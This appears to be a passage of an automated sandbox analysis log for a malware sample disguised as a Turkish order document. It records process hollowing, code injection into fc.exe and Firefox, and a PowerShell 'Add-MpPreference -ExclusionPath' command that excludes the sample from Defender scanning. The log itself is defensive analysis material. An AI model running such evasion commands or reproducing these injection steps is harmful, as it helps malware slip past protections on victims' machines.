            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Memory written: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: NULL target: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Section loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe protection: read write
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\fc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\fc.exe Thread register set: target process: 7656
            Source: C:\Windows\SysWOW64\fc.exe Thread APC queued: target process: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Process created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe"
            Source: C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
            Source: C:\Windows\SysWOW64\fc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152268703.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2057014672.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000000.2223221907.0000000001351000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152268703.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2057014672.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000000.2223221907.0000000001351000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152268703.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2057014672.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000000.2223221907.0000000001351000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000002.4152268703.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 00000008.00000000.2057014672.0000000001000000.00000002.00000001.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000000.2223221907.0000000001351000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe VolumeInformation
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
